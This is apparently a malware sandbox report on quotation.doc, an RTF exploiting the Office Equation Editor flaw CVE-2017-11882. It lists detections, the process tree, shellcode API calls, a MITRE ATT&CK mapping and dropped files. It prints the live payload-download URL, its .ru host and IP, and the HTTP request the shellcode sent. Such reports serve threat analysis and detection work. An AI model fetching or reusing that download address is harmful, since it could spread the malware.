Edit tour

Windows Analysis Report
quotation.doc

Overview

General Information

Sample Name:	quotation.doc
Analysis ID:	1308372
MD5:	290fce33014ad508c6a7e7cf17c2e991
SHA1:	beb0df0e8d7344d428ec63b7f820be08c50ad76a
SHA256:	241367cd4f08afe3402847a7ecbc5c83f54d1c3c3693d00ea6a103d7ed597a9b
Tags:	CVE-2017-11882docNanoCore
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Shellcode detected

Office equation editor establishes network connection

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 3500 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
quotation.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x79:$obj2: \objdata 0x5f:$obj3: \objupdate

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 141.8.197.42, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: quotation.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: quotation.doc	ReversingLabs: Detection: 51%
Source: quotation.doc	Virustotal: Detection: 64%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: unknown Port: 80

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66C14 WinExec,ExitProcess,	2_2_02B66C14
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66B4A LoadLibraryW,URLDownloadToFileW,	2_2_02B66B4A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66BC9 URLDownloadToFileW,	2_2_02B66BC9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66C34 ExitProcess,	2_2_02B66C34
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66B64 URLDownloadToFileW,	2_2_02B66B64
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66AA1 ExitProcess,	2_2_02B66AA1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_02B66AD6 URLDownloadToFileW,	2_2_02B66AD6

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80
Source: global traffic	TCP traffic: 141.8.197.42:80 -> 192.168.2.22:49163

Source: global traffic

DNS query: name: a0862680.xsph.ru

Source: global traffic

TCP traffic: 192.168.2.22:49163 -> 141.8.197.42:80

Source: global traffic

HTTP traffic detected: GET /djlipantro2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: a0862680.xsph.ruConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://a0862680.xsph.ru/djlipantro2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://a0862680.xsph.ru/djlipantro2.1.exeinU

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BB1AFCA5-5498-40FF-BC14-3D4DF358421D}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: a0862680.xsph.ru

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_02B66B4A LoadLibraryW,URLDownloadToFileW,

2_2_02B66B4A

Source: global traffic

System Summary

Malicious sample detected (through community Yara rule)

Source: quotation.doc, type: SAMPLE

Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Source: quotation.doc, type: SAMPLE

Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 771D0000 page execute and read and write	Jump to behavior

Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: quotation.doc	ReversingLabs: Detection: 51%
Source: quotation.doc	Virustotal: Detection: 64%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: quotation.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\quotation.doc

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$otation.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6103.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.expl.winDOC@3/7@1/1

Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: quotation.doc

Static file information: File size 1104718 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_02AF4E19 push cs; iretd

2_2_02AF4E1F

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3264	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3520	Thread sleep time: -120000s >= -30000s			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_02B66C3B mov edx, dword ptr fs:[00000030h]

2_2_02B66C3B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	13 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	12 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	3 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
quotation.doc	51%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
quotation.doc	100%	Avira	TR/AVF.Agent.tcybl
quotation.doc	64%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0862680.xsph.ru	141.8.197.42	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a0862680.xsph.ru/djlipantro2.1.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://a0862680.xsph.ru/djlipantro2.1.exeinU	EQNEDT32.EXE, 00000002.00000002.341724757.000000000060F000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.197.42	a0862680.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1308372
Start date and time:	2023-09-14 23:10:49 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	quotation.doc
Detection:	MAL
Classification:	mal80.expl.winDOC@3/7@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 7 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 72.21.81.240
Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:11:34	API Interceptor	275x Sleep call for process: EQNEDT32.EXE modified

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	573440
Entropy (8bit):	0.021820244057429588
Encrypted:	false
SSDEEP:	6:rl912N0xs+CFQXCB9Xh9Xh9XFUTPgqlS81:rl3lKFQCb77FUTPgeS0
MD5:	EB1621597982F3D792EE60D683C8E179
SHA1:	F3B964FDF69807CD408B8169FC02D6AB735714E7
SHA-256:	A937454D6E3EF14D76D93BD3627479D721BF3A3219ED2948E42B2E18C4906C14
SHA-512:	02535559F0A95FFCDE7340E6DE61E01E1839D3FFB153AFD2BFCBEF76DC2717900D0774F713732E5C3475259E6949EBB915853B735E8390BCD2E7BC7C8A445D9B
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{69E97219-69CA-4D6F-852C-7A88B9BFFFCF}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.9566367088712961
Encrypted:	false
SSDEEP:	6:uNgREqAWlgFJmQDlll8vlwlNB9lFwQFrB:ak5uFJmQ7uvqlNLlKQZB
MD5:	79D738CF3B8ED684C4A8BB195E245A30
SHA1:	BFA23101855A6FEAD977FDDA92240DA4A71A08B4
SHA-256:	C39A69B9C528188A630A2E9B22361D6B40A722AFD6FDEEA97FE0AC654637DF92
SHA-512:	E7B5DAFE32CDF2C345127AD39AFB58C67A3207563AC0B38909BFFFCD30DCE35D63992ED48E5BA7C84CF0F578478982D83226378605044442241E333AFEA68D10
Malicious:	false
Reputation:	low
Preview:	..................8.5.4.5.4.3.5.2.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................................................................$...&...,...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j...h...CJ..OJ..QJ..U..^J..aJ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BB1AFCA5-5498-40FF-BC14-3D4DF358421D}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.402174814211727
Encrypted:	false
SSDEEP:	3:M1EyDFSm4XDFSv:MyyhShc
MD5:	1235F4663AA772DEFB0094B458773BFA
SHA1:	1550C6ABAB4896BB8E239CD274C3BBB87F023728
SHA-256:	A9EED9BF8247648A5F86BF0D7915E2E2F442EDBC64993200858643ECB20E5948
SHA-512:	5A1EC21A2218C430181892A01774849021C7558D93483153729A408412FE6A9F14C141D14CBE21E0FA257CB0B91BD9297A07582BDAE70CCFA643962C502D24A2
Malicious:	false
Reputation:	low
Preview:	[doc]..quotation.LNK=0..[folders]..quotation.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\quotation.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:02 2023, mtime=Fri Aug 11 15:42:02 2023, atime=Thu Sep 14 20:11:32 2023, length=1104718, window=hide
Category:	dropped
Size (bytes):	1009
Entropy (8bit):	4.538690829355147
Encrypted:	false
SSDEEP:	12:8CFRgXg/XAlCPCHaXhzBMzB/J89rX+W1UziJlNCktKicvbLIlL8GADtZ3YilMME1:84/XTxzyc9j+iJ1reXIlLoDv3qqk7N
MD5:	3C0ABAB6844F6D533A21AD7E90F370E3
SHA1:	7E2E29CA3909AC767790D5EA2F60E777FACF9BC1
SHA-256:	CF40CACBB80C51DE1C658982AC4E524F31D9E1B267F2D282AF9FE1C8B6D34C55
SHA-512:	83087A082410CF436475C1124E3742DC7C9674D4CECA160D11D627131CD544E76792B6111DA7A41551AF54F0DE1D651C3D8750B8A6FCA07D2B47046D233E2F21
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....fm.r....fm.r....O..P...N............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WB...user.8......QK.X.WB....&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.N....Wq. .QUOTAT~1.DOC..H.......WB..WB..........................q.u.o.t.a.t.i.o.n...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\quotation.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.q.u.o.t.a.t.i.o.n...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Reputation:	low
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Desktop\~$otation.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Reputation:	low
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	4.001133123215097
